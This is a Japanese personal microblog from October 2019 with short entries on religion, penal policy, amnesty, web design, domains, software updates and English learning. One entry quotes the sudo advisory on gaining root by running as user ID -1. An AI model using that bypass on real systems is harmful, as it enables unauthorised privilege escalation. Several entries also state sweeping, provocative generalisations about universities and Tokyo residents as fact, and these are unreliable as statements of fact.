2019-10-16"open theism" について何か日本人の論評があるかと思ったら、クリスチャンのブログ記事や啓蒙サイトのページがいくつかあるだけだ。もちろん、日本人の大多数はキリスト教どころか神道や仏教の教義にすら関心はないので、こういう論争にも興味はない。多くの人々が関心をもち、心配するのは、せいぜい法事のときにどうするかという作法くらいのものだ。冠婚葬祭の通俗書も、その大半は水引の帯の色だとか、真宗の本願寺派は焼香を一回だけで済ませるとか、そういった話だけである。教義の話題を書いていたとしても、その内容は非常に表面的で浅く、何の説得力もない。したがって、日本人の多くにとって宗教というものは、それが文化人類学的な観点で言って tropes だと理解できる制度やシステムであるというだけではなく、社会学的にも tropes というか、様式あるいは結社の符牒みたいなものだと言いうる。

2019-10-16日本の宗教哲学の議論は寡聞にしてよく知らないので、God as a fictitious necessity or trope といったアプローチで分析したり再構築している人がいるのかどうかは知らないが、そのうち出てくるのだろうなぁ。死を前にした人の "counseling method" と言ってもいいかもしれない。結局、錯覚したままであっても心安らかに死んでいったらいいじゃん、というわけだ。思うに、昨今の mindfulness といったフレーズにもかかわらず、仏教は錯覚ではなくそれ自身の(特殊な)理詰めで納得して死のうということではないかと思う。だから、仏教は宗教ではなく思想だと言われることがあるのだろう。よって、諦観というのは、どっちみち死ぬんだからどうでもいいや、ということではない筈だ。

2019-10-16総務省の「ネットワーク中立性に関する研究会」は、10月1日にあった第9回研究会の記録が二週間過ぎても公開されていない。おおよそどれくらいの日数を経たら公開されるのだろう。あるいは、単に公開する作業が後回しになっているというよりも、何らかの「編集」をしているのだろうか。http://www.soumu.go.jp/main_sosiki/kenkyu/network_churitsu/index.html

2019-10-16また急な話だが、鉄道系の百貨店さんがアド・ネットワークを利用するので、3PAS サービスに渡すコンテンツのサーバを建ててくれという。はっきり言ってコンテンツを 3PAS 側と同期するのは週に7回だけなので、SAKURA のクラウドでもいちばんスペックの低いサーバで問題はない。ドメインの取得と Let's Encrypt の設定も特に手間のかかる話でもないだろう(寧ろ、この手の事案ではドメインをクライアントが決めるのが遅いというのが一番のボトルネックだ)。初期セットアップで、弊社では15万円ていどの標準的な見積もりを出しているが(ベンダーはこれくらいを請求するのがふつうで、こんな作業を数万円でやるウェブ制作会社なんてサーバのセキュリティ設定もやらないし IDS も入れてないと思う)、見積書には下記のような但し書きを付けている。・数量の単位は前後の連絡や社内の相談も含めた「チケット」を単位としています。単純な時間の単位ではありません。/ ・弊社は Privacy by Design + Security by Design の開発・構築・運⽤ポリシーがあるため、セキュリティ対策の費⽤は単独で算出しません。 / ・⼀つの項⽬を削ると、他の項⽬で対処する必要が⽣じて逆に⼯数や⾒積もり⾦額が上がる可能性があります。 / ・弊社は法令順守は当然のことISMSとプライバシーマーク運⽤企業のため、脱法的な仕様や要求には応じません。#ref

2019-10-16トラックが交差点で「左へ曲がります」という音声アラートを発するときがある。これは「右へ曲がります」というアラートはない。なぜなら、右へ曲がるときは曲がる方向に死角がないからだ。左折するときは、トラックのように高い位置で右ハンドルの座席にいると、左下の歩行者などが見え辛いためにアラートを発するようにしているという。特に複数の場所を回る宅配物や郵便物やコンビニエンス・ストアや製パン会社の配送トラックは、左側通行の日本では建物に接した側の道路を回る反時計回りの経路をとるため、左に曲がることが多いという事情もある。ただ、左折専用のレーンでもアラートを発していることがあるのは、ちょっと良く分からない。それに、一部の車両だけだから際立って聞き取れるが、これを殆どの業務車両がやるとナスカー効果で逆に誰も気にしなくなると思う。#歩行論

2019-10-16We know there are west coast racists in city and even schools against non-English natives, reported by many Japanese. Yes, we also know that the United States support better solutions for discriminations because it is the land of the front line of prejudices. たまに書いていることだが、声高に唱えていることが、その土地に最も足りていないものである。イギリス人の「騎士道」、日本人の「和」、アメリカ人の「フェア」。どれも、本来は凡俗に欠けているからこそ、尊ばれるのだ。

2019-10-16暴力的なシーンのテレビ番組を観ることと暴力性の向上に、なんらかの関係があると論じている。クラーク・グリマー(といか、ハードな科学哲学の研究者のたいていに言えるが)も日本では殆ど取り上げられていない研究者だが、こんなものも書いていたのか。そういや、Maria Glymour はクラークがスマリヤンの本をあげたという孫だったかしら。SAGE Journals: Your gateway to world-class research journals

2019-10-16子供の睡眠時間がどうのと書いてるけど、寧ろ教員の睡眠時間を確保するためという方がふさわしいのではないか。生徒の方は、始業時刻が遅くなろうと寝床でケータイいじくってる時間が長くなるだけという可能性がある。Students of California, go ahead: Hit that snooze button. A new law signed by governor Gavin Newsom on Sunday will push back public school start times in an effort to help kids get more sleep.https://qz.com/1727790/californias-new-law-bans-schools-from-starting-before-8am/

2019-10-16PHILSCI.INFO で似たようなことを書いたことがあるのだが、僕は《戦場で役に立たない哲学は、常に役に立たない》と思っている。これはマッチョというよりも、いずれにせよ哲学だって矮小なるホモ・サピエンスの営為の一種なのだし、人が生きるということをまじめに考えるならそうなるだろうという話だ。そして、心理学にも同じことが言えると思う。温厚で理解のある人だけを相手にするカウンセリングなんてものは、最初から有効な成果が見込める人だけを相手にするのであるから、どれほど効果があると言われようと一種のイカサマである。

2019-10-16Nonviolent communication というのがあって、(1) 事実を知る、(2) それに対する自分の感情を知る、(3) その感情の理由である欲求を直視する、(4) その欲求を満たすために何が必要かを問うという手順をとるらしい。もちろん、海千山千の臨床心理(「学」と言っていいかどうかすら怪しい理屈が多い)やカウンセリングを発祥とする活動で、例によってセミナーだの資格だのと手広くビジネスを展開していて、日本のサイトやトレイナーのサイトを見ると、スピリチュアル系のカルトと区別がつかない(区別がつかないように見えてしまうサイトを作ってるのは彼らであり、われわれに非はない)。おおよそ言語療法の一種と言ってよく、厳しい状況で成功した人たちの「言葉遣い」に特徴があるということにヒントを得たというから、要するに自分たちが何らかの到達点に向かっているという言葉を使った集団催眠やコールド・リーディングの一種なのかもしれない。だいたい、お互いに共感することを重視するというが、相対している人々をどうやってそういう目的をもった個人として席に着かせるというのか。これではまるっきり貴族の社交場(金持ち喧嘩せず)を想定したカウンセリングだとしか思えない。NVC Japan

2019-10-16ここ最近、Firefox のアドオンである Scrapbook でページを保存するのが非常に遅くなった。いちおうヘッダー情報を表示するアドオンで通信内容を確認すると、全てのページで共通するのは Ghostery の通信だが、Ghostery を Pause しても保存の所要時間は殆ど変わらない。やはり多くのサイトで Web font なり CDN でホストされている JavaScript ライブラリなり、外部のサーバにあるファイルを使ってページのレンダリングに必要な部品を揃えるようになったからだろうか。

2019-10-16ワンセグやフルセグをサポートする機種が減っているという話だ。確かに事情としてはネット配信の映像を見られたらいいというわけなのだろうけれど、コメントにもたくさん出ているように、そもそもワンセグが映らないんだよ。シャープの IS-03 を使っていた頃はかろうじて観られたが、海外メーカーの機種は正式にサポートされていても全く受信できない。しかも観るのにアンテナ代わりの部品をイヤホンに挿すとか、バカバカしいにもほどがある(それに、そんなもんを挿しても大阪市内の中心部で NHK すら受信できない)。要するに、多くの人にとってはあってもなくても同じなんだよね。理由としては「ネットでの映像配信が増えているため」だという。ドコモ・auの新スマホ、「ワンセグ離れ」が進む | スラド IT

2019-10-16既に各所でフライングの予想が飛び交っていたようだ。何と言っても慶応や早稲田のサークルや体育会系クラブと言えば婦女暴行が伝統だからである・・・と言われて腹が立つなら、二流大学であろうとプライドくらいはあろうから、大学ではなく学生自身が取り組むべきことがあると思うんだよね。そもそも、大学の施設を使ってやってるとは言っても、サークルやクラブ活動なんて大学当局が管理できる範囲は限られているだろう。日大アメフトのヤクザ理事の件にしても、事務方がいったい何をできたというのか。彼らにしても、数年おきにレイプだ麻薬だ詐欺だと事件を起こすような連中をどう管理しろというのか、困惑しているだけだと思う。慶大アメリカンフットボール部が15日、部員の不祥事で無期限活動自粛を発表した。「部内において、複数の部員による著しく不適切な行為があったことが認められた」と、体育会と部の連名でホームページ上に発表。詳細は教育的及びプライバシー保護の観点から公表できないとしたが、関係者によると夏合宿中に部内で男子部員が女子部員を盗撮したという。慶大アメフト無期限活動自粛 男子部員が女子盗撮か - スポーツ : 日刊スポーツ

2019-10-16いま書いたように、僕は刑罰の目的として刑事法学の教科書にも書かれる「教育刑」という概念を信用していない。なぜなら、簡単な話だが、そもそも人の文明は「教育」というものを正しく運用できていないからである。教育などという、人類の歴史が始まってから殆どまともなレベルで理論を定式化できてもいない概念(もしかすると各人が互いに似たようなことを思い込んでいるだけの観念かもしれないが)を根拠に、法廷で決まった刑期を短くして良いかどうかを誰かが決められるという想定には、僕は傲慢さしか感じられない。われわれは有限でたいていは間違っているか不十分なことことしかできない凡庸な存在の集団であって、100人や1,000人が集まって何かをしようと能力は掛け算ではなく些末な数値の足し算にすぎない(本来、保守思想というものはこのような人間観を基礎にしているからこそ、バカのやっかみではなく教養ある人間として正確に反知性主義を議論できるのだ)。

2019-10-16このたび即位礼正殿の儀が執り行われるに際して恩赦の話が出ているのだが(55万人が対象となる。平成30年度の犯罪白書では受刑者の人数は8万人ていどだから、おおよそ恩赦の対象となる8割強は執行猶予がついて服役していない人たちだろう)、僕はこういうことには反対である。下記に恩赦の目的を引用したが、これが《恩赦だからこそやる理由になっていない》のは明らかだ。法務省は更に「恩赦は、有罪の言渡しを受けた人々にとって更生の励みとなる」などと説明しているが、こんなことを励みに刑期や執行猶予の期間を送るというのは、たまたま恩赦を受けた人だけであり、法の下の平等に反する。また、更生してる様子がうかがえるというだけで刑期を短くするというのは、もちろん通常の刑罰でも行われているが、それも含めて厳密には罪刑法定主義に反しており、僕は刑事政策として間違っていると思う。日本は「教育刑」という概念に縛られ過ぎており、それゆえ単なる犯罪を「いじめ」などといって教育が解決できるかのような妄想を人々に植え付けているのだ。教えたり刑罰を加えてもなんともできない人というのは現にいるのであり、多くの国で死刑制度が存続しているのも、結局はそういう人を国家が社会防衛を目的に隔離するコストを払う必要はないという刑事政策の結果なのである。そして、不可抗力などで人を殺してしまった人が刑務所でどれほど悔いたとしても、本当は優しい人だとか、本当は正しい思想をもったテロリストが刑務所に入れられている悲哀などというロール・モデルで刑期の軽減を語るのは、SF 小説を読んで日本の金融政策を提案するようなものだ。罪を犯した人たちの改善更生の状況などを見て、刑事政策的に裁判の内容や効力を変更する恩赦と懲戒免除 なぜあるのか(前田恒彦) - Yahoo!ニュース

2019-10-15そういや、差分プライバシーの提唱で著名なシンシア・ドゥオークを紹介するスピーチを聞いていて思ったのだが、"a" を [ei] と発音する方が自然に感じられる場合というのをつかむのが、まだまだ難しい。特にアメリカ人は不定冠詞として強調する意図がなくても「エィ」と言う場合が多々あるようなので、なおさら発音のリズムだけで決めているのだろう。Differential Privacy and the US Census

2019-10-15LGBT に対抗する単純な言い方(昨今はこの程度の意味でも「言説」などと仰々しく言ってのける連中がいるらしいが、こういうレトリックを繰り出す microaggression などは、その気軽さが問題なのだ)として、「ゲイは信仰に反する」とか、「同性カップルは不自然だ」とか、「男女の親がそろわないと子供が不幸になる」とか、ともかく色々なレトリックがある。こうした短絡を細かく分析したり指摘していくことで、PC だろうと何だろうと多くの点で気づかされることは多い。そして、前にも言ったように、たかが日本語表現の数百や数千をエラーの扱いにしたところで、言語表現なり概念として我々自身の思考や認識が矮小化されるなどということは、特にわれわれのような哲学者にとってはありえない。その程度で委縮するのは、もともと委縮する他はない、しょーもない知性の持ち主だけであると言いたいところだが、それもまた一つの差別であろう。そして、そういうコンプレックスが人をよけいに頑なにさせるのだろう。https://en.wikipedia.org/wiki/Anti-LGBT_rhetoric

2019-10-15うーん。いまどき "skip intro" とか、くだらない演出はやめようよ。差別に対峙してるなら、コンテンツへのアクセシビリティと無関係な安っぽいデザインにも対抗してほしい。僕は Flash を扱っていた時期は短いけれど、デザイナーとしてこんな演出を採用したことが一度もないという点で、少なくとも「三流」のデザイナーではないというくらいの自負をもっている。http://www.blhrri.org/

2019-10-15Twitter のリストにアカウントを追加しようとするとエラーになる。「あんたのせいじゃないと思う」と Twitter が丁寧に表示してるから、自分たちのせいだと分かってるなら何とかしろと思うのだが、まぁ問題を把握してるなら頑張って対応をお願いしよう。

2019-10-15都内でも部落差別について啓発している団体があり、りそな銀行や野村證券や富士通などなど大手の企業が数多く加入している。ただ、電通が加入してるからか、博報堂や ADK や東急エージェンシーといった他の広告代理店が全く加入しておらず、 こんなところでも互いに牽制する場となっているようでは、志の低い活動実態が伺えると言わざるをえない。もちろん、入りたくても入れない企業もあろう。たとえば、その企業の労働組合が特定の政党の配下にある場合とかだ。まったくもって、そういう人々とは関わるだけでも《知的に面倒臭い》ので、人権なり差別については一生の関心事でもあろうと思うが、具体的に活動している人々と連帯したり、特定の活動や団体にコミットするかどうかは決め難い。

2019-10-15それこそ僕が生まれる前からだろうけれど、日本が自然災害の多い国土だという自覚は大人でなくてもあると思うのだが、いつまで経っても「様子を見に行ったところ用水路に落ちて云々」とか、「様子を見に行ったところ波に呑まれて云々」とか、あるいはどう考えても危険に思える崖の下に家を建てるとか、あいかわらず過去の出来事から学ばない集団だなと思う。我が国は2,000年の歴史を誇るとか右寄りの人々は言うわけだが、それで2,000年も何をしていたのかと問わざるをえない。しょせんは私利私欲の名目に畏れ多くもスメラミコトの権威を引っ張り出したり、都合のいい「伝統」やら「国柄」とやらを言い立てては、場当たり的にしか事を為しえない民族という気がする。そら、韓国でなくても文句の一つや二つは言いたくもなろうが、確かに精魂込めて打ち建てたものが台風や地震や津波で短時間かつ簡単に雲散霧消してしまうとなれば、長きに渡って継承しえるのは書籍や碑文のようなものではなく、観念や振る舞いといった、姿かたちをもたないものだけということか。しかし、そうであればなおさら、知恵を尊び伝えることに専心すべきであったものを、仏教やら神道のようなものだけでは、そら西洋や中国の巨大な業績に追いつくのも難しかろう。

2019-10-15au by KDDI のスマート・フォンは、秋冬モデルが登場するようだ。話題になっている観音開きの機器は24万円ということで、新機種を見せびらかしたいか待ち望んでいた人々だけに普及するのだろう。スペックだけなら魅力的な機種は幾つかあるが、やはり僕は今回も機種変更は見送りである。正直言って、通話機能、それから Google Auth を始めとするワンタイム・パスワードのトークン発行ソフトさえ正しく動けば、別に機種変更を無理に急がなくても社会人として使うにあたって何の問題もない。https://www.au.com/mobile/

2019-10-15macOS Catalina では、「ヒラギノ」のゴシック書体が古いものを削除して統一されたようだ。スタイルシートの font-family について推薦する定義内容を掲載したサイトがたくさんあるので、あまりにも古いページは要注意である。macOS Catalinaでヒラギノ角ゴPro/ProNが消える - kyoto.nagoya Blog

2019-10-15Python が 3.8 となった。以前にインストールした Python 3.7 は殆ど使ってないし、RPA として使ってみた Python ベースのアプリケーションもいまいちだったし、両方とも削除して Python 3.8 を入れなおした。ただ、わざわざオプションを有効にしたにもかかわらず、プロンプト・ウィンドウや ConEmu などにパスが通っていない。ついでに入れた PowerShell 7-preview ではパスが通ったので、こういうコマンド・プロンプトのソフトウェアは環境変数をログインするたびにキャッシュしているのかもしれない。いちど調べてみるかな。

2019-10-15ドメインの有効期限が過ぎると、「お名前.com」からドメインの設定操作を変更してくれとか、既に使わない側にしてみれば関係のない操作を求めるメールが一日に何回も送信されてくる。おかげで、本当に重要なメールが何であるのか分かり難くなり、件名でメールを正確にフィルタリングでもしなければ仕事の邪魔になる。

2019-10-15検索してみて気づいたのだが、"zend framework フレームワーク" として2018年からのリソースに限定した検索結果では、ZF の解説は殆ど見当たらない。またいつものように Qiita とかに「使ってみた」系のガラクタ記事が山のようにできあがっていて、素人や新卒の感想《しかない》のが日本のエンジニアの平均的な記事のレベルだということになる。もちろん、コーダやプログラマの大半が CS 学科の修士号をもってるアメリカなどとは違い、日本は体育学部出身の学卒とかが開発ベンダーに入って3ヶ月くらい研修を受けてから、雑兵として IT ゼネコンの戦地に出兵していくからだ。そんな連中がコンピュータ・サイエンスの修士レベルの知識を前提にした記事なんて、素養が不足していて書けるわけがないのだ。何も彼らがバカだからではない。教わってもいない知識を前提にした記事など、ノベール賞を受けた MIT の教授でも書けないのである。まぁ、ZF の概説など修士号を持っていなくても書けるとは思うが。恐らくは、一つのことに専心するというエキセントリックさやコミットメントが不可能な状況に日本が置かれているということの反映ではなかろうか。「オタク」の国なのに、オタクっぽさは疎外されたり遠ざけられているということだ。何かに深くコミットして失敗すると、取り返しがつかない社会だということである。もちろん、アメリカも実際には同じようなものなのだが、何かで失敗して「階級」が何らかのスケールで落ちたとしても、そこではそこなりに食べていけるのが日本とは違っている。もっとも、それは格差が進んでいたり、最初から格差の下にいる人が人種差別などを理由に実際にたくさんいるから、何らかのコミュニティや階層をつくって経済が回っているという事情もあるのだろう。

2019-10-15ムームードメインの価格表がソートできるようになっている。これはありがたい。さきほども営業メールが来ていて、.tech などの TLD が安くなってるというのだが、更新料金がぶっ高いと怖くてドメインを取得できないよね。まぁ、個人のお小遣いで維持できるドメインとしては、せいぜい年間の更新料金が 2,000 円以内だろうと思う。.info とか .org は、まだ安い部類だが、数が多くなると負担にはなるので、数もあまり増やせない。何かのキャンペーンやメッセージとして、1ページだけを公開するサイトを個人として作る場合もあるが、短期間なら初年度の安い期間でも十分かもしれないし、Wayback Machine にアーカイブしてもらえばいいかもしれないが、永続して運用するコンテンツならドメインを固有にして幾つもアピールするのは限界がある。https://muumuu-domain.com/domain/price

2019-10-15『ER』という救急救命医療の現場を描いたテレビ・ドラマがある。僕は修士に入った頃から NHK で観ていたのだが、それの総指揮を執ったマイケル・クライトンという小説家がいて、彼は既に亡くなっているのだが、彼の講演が transcript として掲載されていた。この中に、「マレー・ゲルマン記憶喪失(健忘症)」というフレーズが出てくる。これは主にマス・メディアを批判するために使われていて、僕らは新聞記事の一部を読んで「まったくこいつらは分かってない」と憤慨しても、すぐに別の記事を読むと《事実》が報道されているかのように読んでしまうという健忘症にかかりやすいという。要するにディフォールトで僕らは報道記事やテレビの報道番組を、事実を正確に遺漏なく伝えるものだと思い込みやすいというわけである。ゲルマンの名前は記憶にとどめやすいから友人の名前を使っただけだという。ゲルマンが新聞を安直に信頼しているというわけではない。http://larvatus.com/michael-crichton-why-speculate/

2019-10-15Twitter のスレッドをポイントされても要点がつかめるとは限らないよね。だからといって「まとめ」が適格かどうかも怪しいわけだし。Hacker News に投稿した人間は、そのスレッドを実際に読んで興味深い議論だと思ったからこそ、ソーシャル・ブックマークという場所に submit したんじゃないのか。それなら、何が面白かったのかを submission と一緒に書かないとさ。投げてるだけだし。世界中の人間に全く同一の《面倒臭せーこと》を同時にさせてるだけじゃん。こんなの世界規模の浪費だよ。https://news.ycombinator.com/item?id=21224209

2019-10-15Safari は、怪しいウェブサイトかどうか検証するために、ディフォールトでアクセス先の IP アドレスを Tencent へ送信しているとか。Apple によると、Tencent は Google ではないと言うのだが、いや Tencent って僕からすると中国のゲーム会社であって、Google のような規模の会社だろうとなかろうとユーザの IP アドレスを送信する相手として間違っているのではないか。別にセキュリティ会社じゃないし。Apple insists it

2019-10-15macOS の最新版であるCatalina は、Mail アプリケーションでヘッダーのデータしかないメールをメール・ボックスどうしで移動させたら削除されたメールとして扱われてしまい、その後で完全に消去されてしまう恐れがあるという。もちろん、ヘッダーしかないメールというのは、やや特殊なメールだ。メーリング・リストの管理システムへコマンドを投げるのに body ではなく subject に記述するなんてものはない筈だし(だいたいは body の方に書くものだ)、ともかく本文がないメールを残しておかなければいけないという理由は思い付き辛い。Missing message issues plague Mail users in macOS Catalina

2019-10-15矢沢永吉がメールであれこれ言われたのに逆切れしたとかいう話題は、結局のところ苦情メッセージと自分の反論を出したり引っ込めたりして、どういう対処をするべきか決めかねているらしい。まぁ公表しない方がいいとは思うので、そのまま記事は非表示でいい(アクセスするとタイトルがメタ・データとして返ってくるから、記事を削除したのではなく非表示にしてるだけらしい)。ただ、その問題の苦情メッセージだけど、冒頭に「日比谷参戦の方々に無料配信」と書かれている。もちろん、無料配信がコンサートの準備風景なのは知ってるんだけど、苦情メッセージの本文みたいに書いてあるのはどういうことなんだろう。これ、どういう体裁で引用してるテキストなのか全く分からないのだけど、送ってきた本人の苦情メッセージにこんなことが冒頭に書いてあったとは思えない。変な引用の仕方だなぁ。矢沢永吉のスタッフって、広告代理店も絡んでるだろうに、こういうメッセージとか広報とかのまともなスタッフがいないのかな。それなら余計にブログとか記事とかは、事務的な通知以外は何も書かない方がいいね。メールをくれた君へ。

2019-10-15弊社の東京営業所を移転する話は、色々と条件を提示して部屋を業者さんに探してもらっている。電話番号を変えたくないというのが、まぁ当然だと思うが第一の条件なので、部屋の候補には限りがある。また、立地からすると費用もそれなりにかかることが予想される。既に東京営業所のメンバーは5名を切っているし、もうオンラインだけで営業してるサービスなのだから、いくら出張して東京で動く人員がいるとは言え、わざわざ営業所を借りて維持する必要があるのかという議論も役員ではしているだろう。もちろん東京在住の社員は(関東圏から出たことがないような人も)何人かいるし、東京に営業所があるという前提で中部地方から新幹線で通っている社員すらいるわけだが、営業所を置くメリットだけを考えて、大きな固定費に見合うかどうかを検討しなくてはいけない。

2019-10-15明日から自社サービスで Twitter を使ったプレゼントの応募(元 ZOZOTOWN の社長もやってた、いわゆるオープン懸賞)を始めるらしい。いつものように、事前の相談が全くないまま、情報セキュリティの委員をやっている経理のスタッフに教えてもらうという状況となったので、Twitter の運用を担当している部署で話を聞いた。個人情報は DM ではやり取りせずに、募集が終わってから専用フォームの URL を当選者に知らせるとのことだ。ひとまずキャンペーンが始まった段階では、弊社の個人情報保護方針へのリンクを掲示しておけばよいだろう。実際に本人への同意を必要とする情報の取得においては、公表事項を掲示するひとが必須のため、これは僕の方で用意する。応募期間が終わるのは11月であり、フォームのページは全くデザインもしていない(誰がフォームを「実装」するのかは知らないが)ため、これからの作業になる。それはそうと、いまどき1万円を30人にバラ撒くていどでは、インパクトないよなぁ。100万円を100人にバラ撒いてる連中がいるんだし。

2019-10-15亡くなったばかりのハロルド・ブルームについて調べてみると、名前は知っている文学者なのに意外と翻訳されていないことが分かる。主著とされる『影響の不安 ― 詩の理論のために』(1973年に初出)が訳出されたのも2004年というし、やはり「保守的」と評された著作は不利なのだろうか。

2019-10-15今年のノベール賞で医学・生理学賞を受けた一人である、ピーター・ラトクリフが Nature から受賞に関わる論文を reject されていたという話があった。しかし、そんなことは数々の過去の事例を持ち出すまでもなく、それまでに見つかっていたことを乗り越えようとする内容なのだから、既存の常識において評価できないという理由で却下されても仕方のないことであろう。寧ろ、人類初の発見や新規の理論を伝える論文を読んで「ああ、こんなのもう知ってたよ」と言うレフェリーがいたら、そいつは嘘つきか妄想を抱えているかのどちらかだ。ちなみに、この話題に関して下記のようなカール・セーガンの引用を書いている人がいたので調べてみたのだが、これも英語を読んでいて難しいと感じることの一つだ。"Bozo the Clown" は「ピエロ(欧米では「クラウン」と呼ぶ方が多い)」だけを知ってても意味は通じる。しかし、クラウンの登場する子供向けの番組という情景を思い浮かべるには、やはり "Bozo the Clown" というフレーズだけで何のことなのかを理解できなくてはいけない。But the fact that some geniuses were laughed at does not imply that all who are laughed at are geniuses. They laughed at Columbus, they laughed at Fulton, they laughed at the Wright Brothers. But they also laughed at Bozo the Clown. --- Carl Saganhttps://news.ycombinator.com/item?id=21245982

2019-10-15In reality, most servers have not made a configuration for sudoers to add someone as a user who is able to execute commands as the root.When sudo is configured to allow a user to run commands as an arbitrary user via the ALL keyword in a Runas specification, it is possible to run commands as root by specifying the user ID -1 or 4294967295.https://www.sudo.ws/alerts/minus_1_uid.html

2019-10-15十二国記シリーズの最新刊は、さきほどアマゾンで支払いを済ませた。他の古本と一緒に 3,000 円の請求だったのに、古本の支払いだけ済ませたら、注文履歴では支払いが終わったような体裁に見えていたのだが、やはり発売日に予約本の請求が来て支払うという手順になっているようだ。クレジット・カードを使っていれば、発売日にすぐ決済が実行されて発送となるのだろうが、いずれにしても次からはこんな注文はしない。予約だから実店舗とは違って「買えない」という結果には至らないと思うが、いくら人気があろうと新潮文庫がジュンク堂クラスの大型書店で手に入らなくなるなんてことはまずないし、実店舗で買った方が絶対に早い。

2019-10-15内閣府が発行している「マイナンバーメールマガジン」は、7pay のインシデントにまつわる話を第53号から既に3回も続けている。というか、そもそもメール「マガジン」の定義を満たしていないように思うのだが。"magazine" というと、"a periodical containing miscellaneous pieces" ということで、内容は "pieces" と複数でなくてはいけない。一つの話題だけをメールで投げる、個人がエッセイをよく有料で配信しているようなものは、英語では "newsletter" であって、幾つかのコンテンツをもつ "magazine" とは表現されないし、それら複数の話題をもつメールは "e-zine" と言っている。

2019-10-15こういうことを書くと「うちの営業が犯罪者だっていうのか!」みたいな反応をする人がいるんだけど、いや・・・犯罪者かどうか、うちは判断できないからお断りだと言ってるわけよ。で、「お前はそんなことを書くほど偉いのか」とか言うかもしれないけど、俺は偉いんだよ。実際。【弊社への営業メールについて】弊社ではHTMLメールはテキストに強制変換するルールです。画像などでのアピールは無意味なので、それを見てるという前提で文章を書くのはやめてください。また短縮URLは絶対にクリックするなと指示しています。無駄なので、そういうメールはご遠慮ください。(To advertisers and sales people who send an email: Do not send an HTML email which is not allowed under regulations in ISMS and PII Protection. And do not use a shortened URL which may be simply malicious. We cannot verify it.)#here

2019-10-14先月から近くの歯科医院へ通っている。土曜日は実家へ行くし午前中は予約を取るのが難しいため、平日の夕方に予約している。ありがたいことにフレックス・タイムを利用して16時で退出すると、徒歩で帰宅しても余裕をもって通院できる。

2019-10-14当社のコーポレート・サイトでも採用しているようだが、スクロールしていくと順番に画像やボックス要素をフェード・インで表示するという手法は、いい加減にどうにかならないものだろうか。スクロールしてからコンテンツの表示が完了するまで数秒は待つことになるため、まるで紙芝居のようだし、そもそもそんなことをしなくてはいけない画像のデカさを改善するのが「設計(デザイン)」の仕事であろう。馬鹿みたいに巨大な写真を張り付けるだけなら、それこそデジタル・カメラで撮影した巨大な画像ファイルを img タグの属性で 200x160 ピクセルに縮小して表示させていた15年くらい前の地方自治体の役人と同じレベルであろう。それに、スクロールするたびにフェード・インするという演出は目が疲れる。

2019-10-14そういえば Cambridge University Press の辞書って、初めて発売された頃はよく見かけたのだが、最近は書店で見かける機会が少ない。調べてみると、"CALD" と呼ばれる中級者向けの辞書でも2003年が初版だというから、OALD に比べて実績が乏しくシェアが小さいのだろう。辞書は出版社にとっては先行投資が大きく負担になる出版物なので、売れないと継続は難しい。他の辞書も見かける機会は少なく、やはり英英辞典は日本では Oxford と Longman が圧倒している感がある(もちろんアメリカ国内の「国語辞典」としては Webster's が圧倒的だ)。ちなみに、中邑光男さんの「学習英英辞書を比較する」というエッセイ(2005)を読んで、OALD, LDOCE などの比較は適格だと思った。ただ、LDOCE を「大阪的」と評するのは、中邑さんが関大の教員である事情を差し引いても違和感がある。いまどき大阪にそんな昔の《あきんど》みたいな人はいないと思う。 それから、比較されている辞書で唯一持っていない LAAD の解説を読んで、一冊持っておこうと思った。そういう「恐い」用例の辞書も読みたい。

2019-10-14英語の単語や熟語の本をアマゾンで物色していると、最近は Japan Times から難しい単語集が出ている。他にも大学受験用の教材では見かけない単語を取り上げた本が少しずつ出てきているのだが、たいていそういう教材のレビューは大半が「簡単だ」という評価になっている。それなら買わなきゃいいのに。書店で現物を眺めたら自分に合った教材かどうかの判断くらいはつく。僕は、この手の教材を《ジャケ買い》するのは良くないと思うんだよね。それこそ、レビュアーの大半が自己紹介で英検1級だ TOEFL 満点だと言ってるのに、本を選ぶスキルは5級以下というのでは、ただの英単語記憶マシンだ。そんな人間がどれほど語彙を持っていても、世の中の役には立たない。実際、そういうことを豪語するような人間が、ブログだろうと SNS だろうと実際に英語で何かを発信したり仕事や趣味に役立てているという実例を殆ど聞いたことがないんだよね。彼らが虚勢を張っているとは思わないけれど、現実にはこういう人たちが日本中に何人いても、言葉の学習成果を活用しているとは思えない。よって、そのようなノウハウや成果が、まずもって子供に継承されないのだ。日本人の多くが全く英語を使えないという理由の一つは、要するに言葉を習得した人間が自足的に満足するだけでしかなく、そういう文化的な環境が維持できていないからなのである。まるで個々の人が大昔の交易商人のように自力で取引先の外国語を覚えて、自分だけの知的財産として隠し通しているかのようである。実際、英語ができるという人を、なぜか逆に白眼視するような風土があるから、余計に表に出しにくいんだよね。いまだに。だからこそ SNS などで匿名で活用したりすればいいし、他人なんてどうでもいいから自分の子供には家庭で自分が習得した英語を活用すればいいのに。

2019-10-13Some residents in Tokyo are descendants of killers at the Korean and Chinese Massacre in 1923. They will do it when they need to exclude people from their "lovely" community.Tokyo's Taito-ku required people to show proof of residence to enter evacuation shelters. Two comments: (1) this excludes homeless and other people who are at the greatest risk; and (2) who runs away from a potentially dangerous situation and remembers to bring proof of address?https://twitter.com/jeremyyellen/status/1183210465830162433

2019-10-13『「氷河期が近いから地球温暖化は関係ない」の誤り』というタイトルで始まる文章なのだが、どこまで読んでも「氷河期へ至る寒冷化の影響と相殺されるか、寒冷化の影響のほうが大きいのではないか」という疑問について何の反論も書いていない。単に短期的なスケールで温暖化しているという現象論(つまり《目盛りの話》だけをしているということ)の事例をあれこれと書いているだけだ。温暖化のリスクを訴える理屈としては説得力のあるものが出揃っているように思うのだが、理屈だけではない人の怠惰にどう訴えるかとか、理屈は知ってるが利害関係をどう調整するかとか、そういうことを考慮して的確に議論できる人材が非常に少ない。よって、こういう肩書だけでものを書いているような手合いが下らない文章をバラまいては、多くの人たちに「そうかもしれないけどさぁ」という不承不承の印象しか残さずに終わるのだろう。これも日本の、出版業界は活発だが実は書き手は非常に貧弱な状況を反映していると思う。「アナリスト」という職能にあるからといって、解説したり論説を手掛ける才能など保証されてはいない。信夫君がやってるエネルギー問題のブログにしたって、あそこに集まる人々が記事を公表はしているが、学術的には論外でプロパーは誰も読んでないだろうし、パブリシティにおいても殆ど話題にはならないし、エネルギー問題にかかわる NPO/NGO も、完全に無視しているようだ。あんなのは都内の物書きやプロパーが「俺はあのときこう言っていた」というアリバイ工作に使うためのプレデター雑誌か、せいぜい書きたいことを書くエロ本の同人誌みたいなものだろう。「氷河期が近いから地球温暖化は関係ない」の誤り

